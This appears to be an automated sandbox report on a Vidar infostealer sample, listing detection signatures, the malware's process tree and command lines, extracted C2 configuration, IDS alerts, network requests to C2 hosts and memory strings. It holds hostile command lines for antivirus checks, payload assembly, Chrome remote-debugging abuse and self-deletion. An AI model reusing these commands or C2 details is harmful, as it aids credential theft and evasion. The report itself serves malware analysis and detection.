
Windows Analysis Report
9EI7wrGs4K.exe

Overview

General Information

Sample name: 9EI7wrGs4K.exe (renamed because original name is a hash value)
Original sample name: 8eb4f92605e35c57a42b0917c221d65c.exe
Analysis ID: 1579617
MD5: 8eb4f92605e35c57a42b0917c221d65c
SHA1: 0e64d77ef1b917b3afe512b49710250c71369175
SHA256: b57d78d93f74f7ae840ab03d3fda4f22a24ad35afcf9a53128cf82a92a67a085
Tags: exe, user-abuse_ch

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 9EI7wrGs4K.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\9EI7wrGs4K.exe" MD5: 8EB4F92605E35C57A42B0917C221D65C)
    • cmd.exe (PID: 7324 cmdline: "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7412 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7420 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7456 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7464 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7500 cmdline: cmd /c md 245347 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7516 cmdline: findstr /V "profiles" Organizing MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7532 cmdline: cmd /c copy /b ..\Judy + ..\Sheets + ..\Another + ..\Wanting b MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Dry.com (PID: 7548 cmdline: Dry.com b MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 7928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 3808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2664 --field-trial-handle=2436,i,2326185924159091694,5961255311856640227,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • cmd.exe (PID: 1228 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\245347\Dry.com" & rd /s /q "C:\ProgramData\OHVS0RIMGLNY" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6348 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 7564 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
0000000A.00000003.1842774905.0000000003C91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000A.00000003.1842371095.0000000003C91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000A.00000003.1842833283.000000000165D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
(5 of 9 entries shown)

Source | Rule | Description | Author | Strings
10.2.Dry.com.3f90000.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source: Process started | Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Dry.com b, ParentImage: C:\Users\user\AppData\Local\Temp\245347\Dry.com, ParentProcessId: 7548, ParentProcessName: Dry.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7928, ProcessName: chrome.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7324, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7464, ProcessName: findstr.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T06:21:29.220597+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 94.130.188.57 | 443 | 192.168.2.4 | 49745 | TCP
2024-12-23T06:21:31.758950+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 94.130.188.57 | 443 | 192.168.2.4 | 49746 | TCP
2024-12-23T06:21:29.220536+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 94.130.188.57 | 443 | TCP
2024-12-23T06:21:24.647125+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 94.130.188.57 | 443 | TCP


                AV Detection

Source: 0000000A.00000003.1842774905.0000000003C91000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source: 9EI7wrGs4K.exe | ReversingLabs: Detection: 21%
Source: 9EI7wrGs4K.exe | Virustotal: Detection: 18%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 89.5% probability
Source: 9EI7wrGs4K.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: 9EI7wrGs4K.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
Source: C:\Users\user\Desktop\9EI7wrGs4K.exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B4DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00B4DC54
Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B5A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00B5A087
Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B5A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00B5A1E2
Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B4E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00B4E472
Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B5A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00B5A570
Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B566DC FindFirstFileW,FindNextFileW,FindClose,10_2_00B566DC
Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B1C622 FindFirstFileExW,10_2_00B1C622
Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B573D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00B573D4
Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B57333 FindFirstFileW,FindClose,10_2_00B57333
Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B4D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00B4D921
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\245347
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\245347\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: chrome.exe | Memory has grown: Private usage: 11MB later: 41MB

                Networking

Source: Network traffic | Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49745 -> 94.130.188.57:443
Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.188.57:443 -> 192.168.2.4:49745
Source: Network traffic | Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49743 -> 94.130.188.57:443
Source: Network traffic | Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.188.57:443 -> 192.168.2.4:49746
Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199809363512
Source: global traffic | HTTP traffic detected:
    GET /k04ael HTTP/1.1
    Host: t.me
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View | IP Address: 94.130.188.57 94.130.188.57
Source: Joe Sandbox View | IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View | IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown | TCP traffic detected without corresponding DNS query: 44.206.23.126
Source: unknown | TCP traffic detected without corresponding DNS query: 44.206.23.126
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown | TCP traffic detected without corresponding DNS query: 18.66.161.122
Source: unknown | TCP traffic detected without corresponding DNS query: 13.227.8.41
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown | TCP traffic detected without corresponding DNS query: 18.66.161.122
Source: unknown | TCP traffic detected without corresponding DNS query: 13.227.8.41
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown | TCP traffic detected without corresponding DNS query: 18.66.161.122
Source: unknown | TCP traffic detected without corresponding DNS query: 23.32.238.179
Source: unknown | TCP traffic detected without corresponding DNS query: 23.32.238.179
Source: unknown | TCP traffic detected without corresponding DNS query: 18.66.161.122
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown | TCP traffic detected without corresponding DNS query: 23.32.238.179
Source: unknown | TCP traffic detected without corresponding DNS query: 23.32.238.179
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\245347\Dry.com | Code function: 10_2_00B5D889 InternetReadFile,SetEvent,GetLastError,SetEvent,10_2_00B5D889
Source: global traffic | HTTP traffic detected:
    GET /k04ael HTTP/1.1
    Host: t.me
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: toptek.sbs
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /async/newtab_promos HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
                Source: chrome.exe, 0000000F.00000003.2035434844.0000335C003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2035317380.0000335C00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2035235015.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style 
include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: global traffic | DNS traffic detected: DNS query: bGZEIFIQcYIvivmO.bGZEIFIQcYIvivmO
Source: global traffic | DNS traffic detected: DNS query: t.me
Source: global traffic | DNS traffic detected: DNS query: toptek.sbs
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: unknown | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----T0ZUSR1VAI58QQI5XT2D
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: toptek.sbs
    Content-Length: 255
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anglebug.com/3970
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
